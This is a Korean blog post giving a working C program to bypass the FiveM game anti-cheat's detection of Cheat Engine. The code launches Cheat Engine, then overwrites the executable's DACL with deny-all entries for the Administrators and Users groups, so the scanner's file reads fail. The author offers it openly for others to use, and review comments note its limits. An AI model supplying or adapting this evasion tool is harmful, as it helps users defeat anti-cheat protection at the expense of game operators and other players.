Fivem Cheat Engine Bypass
FiveM은 현재 Window Station 안의 프로세스를 열거한 뒤 CreateFile, ReadFile, GetFileAttributes 등의 API로 실행 파일을 읽어 패턴 매칭을 하는 것으로 보인다(관찰에 따른 추정이며 확인된 내부 동작은 아니다).
우회 순서는 Cheat Engine을 실행한 뒤 해당 실행 파일의 DACL에 거부(Deny) ACE를 넣어, FiveM이 그 파일을 여는 탐지 API 호출이 접근 거부로 실패하도록 만드는 것이다. 단, DACL은 새 접근 검사에만 적용되므로 파일 소유자의 암묵적 WRITE_DAC, SeTakeOwnershipPrivilege/SeBackupPrivilege를 가진 프로세스, 이미 핸들을 열어 둔 프로세스는 막지 못할 수 있다.
로직의 흐름은 그룹 SID를 생성하고(AllocateAndInitializeSid), 거부 ACE 두 개만으로 새 ACL을 만든 뒤(SetEntriesInAcl), 파일 핸들에 적용하는(SetSecurityInfo) 순서다.
자료가 많이 없어 좀 헤맸다.. 항상 성공하면 뿌듯~ㅋ
# AllocateAndInitializeSid
# SetEntriesInAcl
# SetSecurityInfo
나중에 까먹을까봐 메모
사용하실 분은 쓰세요. 궁금하신 건 댓글 달아 주세요.
#include <windows.h>
#include <stdio.h>
#include <AclAPI.h>
#include <tchar.h>
#pragma comment(lib, "advapi32.lib")
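/*
 * Launch the executable at lpPath, then replace that file's DACL with two
 * DENY ACEs (GENERIC_ALL for BUILTIN\Administrators and for BUILTIN\Users).
 * Per the write-up above, the intent is that a scanner running under one of
 * those groups gets ACCESS_DENIED when it later opens the binary with
 * CreateFile/GetFileAttributes, so its file pattern matching fails.
 *
 * NOTE(review): the function name is historical -- no directory is created.
 * Limits of this approach, worth knowing before relying on it:
 *  - The invoking user is normally a member of BUILTIN\Users, so the user is
 *    locked out of the file as well; the owner's implicit READ_CONTROL /
 *    WRITE_DAC (or SeTakeOwnershipPrivilege, e.g. takeown/icacls) is what
 *    undoes it.
 *  - A DACL only governs new access checks: a scanner running as SYSTEM, one
 *    holding SeBackupPrivilege, or one that already has a handle or image
 *    section open is not necessarily affected -- TODO confirm on the target.
 *  - The child is started (and its image mapped) before the ACL is changed,
 *    so the change does not hinder the launched process itself.
 *
 * lpPath  : path of the executable to launch and then lock down.
 * Returns : TRUE on success, FALSE on failure (a diagnostic is printed).
 *           Process/thread handles, the file handle, both SIDs and the ACL
 *           are released on every return path.
 */
BOOL CreateDirectoryWithUserFullControlACL(LPCTSTR lpPath)
{
    BOOL ok = FALSE;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    PSID pAdminSID = NULL, pUserSID = NULL;
    PACL pACL = NULL;
    EXPLICIT_ACCESS ea[2];
    SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY;
    DWORD dwRes;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);            /* CreateProcess requires cb to be set */
    ZeroMemory(&pi, sizeof(pi));

    /* bInheritHandles=TRUE is kept from the original; nothing here is marked
       inheritable, so FALSE would be the least-privilege choice. */
    if (!CreateProcess(lpPath, NULL, NULL, NULL, TRUE, CREATE_NEW_CONSOLE,
                       NULL, NULL, &si, &pi))
    {
        printf("[*]Create Process Faile\n");
        /* was "%0x%X": two conversions for a single argument (undefined
           behaviour); DWORD is unsigned long, hence %lX */
        printf("[*]ERROR CODE: 0x%lX\n", GetLastError());
        return FALSE;
    }
    printf("[*]Create Success\n");

    /* Request only the rights needed to read and rewrite the DACL. */
    hFile = CreateFile(lpPath, READ_CONTROL | WRITE_DAC, 0, NULL, OPEN_EXISTING,
                       FILE_FLAG_BACKUP_SEMANTICS, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("[*]Create File Fail\n");
        printf("[*]ERROR CODE: 0x%lX\n", GetLastError());
        goto CleanUp;
    }
    printf("[*]Create File Success\n");

    /* S-1-5-32-544: BUILTIN\Administrators */
    if (!AllocateAndInitializeSid(&SIDAuthNT, 2,
                                  SECURITY_BUILTIN_DOMAIN_RID,
                                  DOMAIN_ALIAS_RID_ADMINS,
                                  0, 0, 0, 0, 0, 0, &pAdminSID))
    {
        _tprintf(_T("[*]AllocateAndInitializeSid Error %lu\n"), GetLastError());
        goto CleanUp;
    }
    /* S-1-5-32-545: BUILTIN\Users */
    if (!AllocateAndInitializeSid(&SIDAuthNT, 2,
                                  SECURITY_BUILTIN_DOMAIN_RID,
                                  DOMAIN_ALIAS_RID_USERS,
                                  0, 0, 0, 0, 0, 0, &pUserSID))
    {
        _tprintf(_T("[*]AllocateAndInitializeSid Error %lu\n"), GetLastError());
        goto CleanUp;
    }

    /* Zero first: EXPLICIT_ACCESS has Trustee fields this code never sets
       (pMultipleTrustee, MultipleTrusteeOperation) and SetEntriesInAcl reads
       them. Both entries are DENY GENERIC_ALL on a group SID. */
    ZeroMemory(ea, sizeof(ea));
    ea[0].grfAccessPermissions = GENERIC_ALL;
    ea[0].grfAccessMode        = DENY_ACCESS;
    ea[0].grfInheritance       = NO_INHERITANCE;
    ea[0].Trustee.TrusteeForm  = TRUSTEE_IS_SID;
    ea[0].Trustee.TrusteeType  = TRUSTEE_IS_GROUP;
    ea[0].Trustee.ptstrName    = (LPTSTR)pAdminSID;

    ea[1].grfAccessPermissions = GENERIC_ALL;
    ea[1].grfAccessMode        = DENY_ACCESS;
    ea[1].grfInheritance       = NO_INHERITANCE;
    ea[1].Trustee.TrusteeForm  = TRUSTEE_IS_SID;
    ea[1].Trustee.TrusteeType  = TRUSTEE_IS_GROUP;
    ea[1].Trustee.ptstrName    = (LPTSTR)pUserSID;

    /* The existing ACL is not merged (3rd argument NULL): the resulting DACL
       holds ONLY the two deny entries, so no allow ACE remains for anyone. */
    dwRes = SetEntriesInAcl(2, ea, NULL, &pACL);
    if (dwRes != ERROR_SUCCESS)
    {
        /* SetEntriesInAcl returns the error code itself; GetLastError() is
           not the right value to report here. */
        _tprintf(_T("[*]SetEntriesInAcl Error %lu\n"), dwRes);
        goto CleanUp;
    }

    /* The original ignored this result and reported success regardless. */
    dwRes = SetSecurityInfo(hFile, SE_FILE_OBJECT, DACL_SECURITY_INFORMATION,
                            NULL, NULL, pACL, NULL);
    if (dwRes != ERROR_SUCCESS)
    {
        _tprintf(_T("[*]SetSecurityInfo Error %lu\n"), dwRes);
        goto CleanUp;
    }
    ok = TRUE;

CleanUp:
    if (pACL)
        LocalFree(pACL);               /* SetEntriesInAcl output is LocalAlloc'd */
    if (pUserSID)
        FreeSid(pUserSID);
    if (pAdminSID)
        FreeSid(pAdminSID);
    if (hFile != INVALID_HANDLE_VALUE)
        CloseHandle(hFile);
    /* The child is neither waited on nor used further; drop our references
       so the process/thread handles do not leak. */
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return ok;
}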
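/*
 * Entry point. argv[1] is the path of the executable to launch and lock down.
 * Exit status: 0 on success, -1 when the argument is missing or the ACL
 * change failed (a diagnostic is printed in both cases).
 *
 * NOTE(review): argv[] is narrow char; passing it as LPCTSTR only compiles
 * (and works) in a non-UNICODE build. A UNICODE build needs _tmain/_TCHAR or
 * an explicit MultiByteToWideChar conversion.
 */
int main(int argc, char** argv)
{
    /* Check the count, not just argv[1]: argv[1] is only addressable when
       argc >= 1 (argv[argc] is the terminating NULL). */
    if (argc < 2 || argv[1] == NULL)
    {
        printf("[*]Invaild Argument.. Input Path\n");
        return -1;
    }
    printf("[*]Path: %s\n", argv[1]);

    if (CreateDirectoryWithUserFullControlACL(argv[1]))
    {
        printf("[*]Complete\n");
        return 0;
    }
    printf("[*]Faile\n");
    return -1;
}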

# Reference
https://docs.microsoft.com/en-us/windows/win32/api/accctrl/ns-accctrl-explicit_access_a
EXPLICIT_ACCESS_A (accctrl.h) - Win32 apps
Defines access control information for a specified trustee.
docs.microsoft.com
https://deguls.tistory.com/entry/DACL%EA%B3%BC-SACL-%EB%B3%B5%EC%8A%B5
DACL과 SACL 복습
출처: http://blog.naver.com/knuabhoony?Redirect=Log&logNo=40014321712 일반적으로 ACL 이라고만 하면 DACL를 뜻함. DACL = discretionary access control list, SACL = system access control list(감사용 ACL; 접근 허용/거부를 결정하는 것은 DACL이다). DACL에는..
deguls.tistory.com
https://docs.microsoft.com/en-us/windows/win32/fileio/file-security-and-access-rights
File Security and Access Rights - Win32 apps
Because files are securable objects, access to them is regulated by the access-control model that governs access to all other securable objects in Windows.
docs.microsoft.com